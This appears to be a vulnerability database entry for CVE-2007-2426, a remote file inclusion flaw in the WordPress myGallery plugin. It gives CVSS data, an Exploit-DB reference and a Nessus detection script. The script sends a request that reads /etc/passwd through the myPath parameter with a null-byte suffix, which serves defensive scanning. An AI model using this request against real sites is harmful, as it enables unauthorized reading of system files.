Vulnerabilities > CVE-2007-2426 - Remote File Include vulnerability in Wordpress MyGallery Plugin

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
wildbits
nessus
exploit available

Summary

PHP remote file inclusion vulnerability in myfunctions/mygallerybrowser.php in the myGallery 1.4b4 and earlier plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the myPath parameter.

Vulnerable Configurations

Part Description Count
Application
Wildbits
1

Exploit-Db

descriptionWordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability. CVE-2007-2426. Webapps exploit for php platform
fileexploits/php/webapps/3814.txt
idEDB-ID:3814
last seen2016-01-31
modified2007-04-29
platformphp
port
published2007-04-29
reporterGoLd_M
sourcehttps://www.exploit-db.com/download/3814/
titlewordpress plugin mygallery <= 1.4b4 - Remote File Inclusion Vulnerability
typewebapps

Nessus

NASL familyCGI abuses
NASL idMYGALLERY_MYPATH_FILE_INCLUDE.NASL
descriptionThe third-party myGallery module for WordPress installed on the remote host fails to sanitize input to the
last seen2020-06-01
modified2020-06-02
plugin id25116
published2007-04-30
reporterThis script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/25116
titlemyGallery mygallerybrowser.php 'myPath' Parameter Remote File Inclusion
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(25116);
  script_version("1.19");
  script_cvs_date("Date: 2018/11/15 20:50:18");

  script_cve_id("CVE-2007-2426");
  script_bugtraq_id(23702);
  script_xref(name:"EDB-ID", value:"3814");

  script_name(english:"myGallery mygallerybrowser.php 'myPath' Parameter Remote File Inclusion");
  script_summary(english:"Attempts to read a local file with myGallery.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
remote file include vulnerability.");
  script_set_attribute(attribute:"description", value:
"The third-party myGallery module for WordPress installed on the remote
host fails to sanitize input to the 'myPath' parameter of the
'/mygallery/myfunctions/mygallerybrowser.php' script before using it
to include PHP code. An unauthenticated attacker can exploit this
issue to view arbitrary files on the remote host or possibly to
execute arbitrary PHP code, perhaps from third-party hosts.

Note that exploitation of this issue does not require that PHP's
'register_globals' setting be enabled.");
  script_set_attribute(attribute:"see_also", value:"https://www.wildbits.de/2007/04/29/sicherheitsluecke-in-mygallery/");
  script_set_attribute(attribute:"solution", value:"Upgrade to myGallery version 1.4b5 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:W/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/04/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/04/30");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

plugin = "myGallery";

# Check KB first
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);

if (!installed)
{
  checks = make_array();
  path = "/wp-content/plugins/";
  checks[path + "mygallery/languages/myGallery.pot"][0] =
    make_list('myGallery', 'mygalleryoptions\\.php');

  # Ensure plugin is installed
  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext    : plugin
  );
}
if (!installed)
  audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " plugin");

# Try to retrieve a local file.
file = "/etc/passwd";
w = http_send_recv3(
  method:"GET",
  item:dir + "/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?" +
    "myPath=" + file + "%00",
  port:port,
  exit_on_fail:TRUE
);
res = w[2];

# There's a problem if...
if
(
    # there's an entry for root or...
    egrep(pattern:"root:.*:0:[01]:", string:res) ||
    # we get an error saying "failed to open stream" or...
    "main(" + file + "\\0/wp-config.php): failed to open stream" >< res ||
    # we get an error claiming the file doesn't exist or...
    "main(" + file + "): failed to open stream: No such file" >< res ||
    # we get an error about open_basedir restriction.
    "open_basedir restriction in effect. File(" + file >< res
)
{
  contents = NULL;
  if (egrep(string:res, pattern:"root:.*:0:[01]:"))
  {
    contents = res;
    contents = contents - strstr(contents, "<br");
  }

  if (contents && egrep(string:contents, pattern:"root:.*:0:[01]:"))
  {
    contents = data_protection::redact_etc_passwd(output:contents);
    if (report_verbosity > 0)
    {
      report =
        "Here are the contents of the file '/etc/passwd' that Nessus was" +
        '\n' + 'able to read from the remote host :\n' +
        '\n' + contents;
      security_hole(port:port, extra:report);
    }
  }
  else security_hole(port);
  exit(0);
}
audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + " plugin");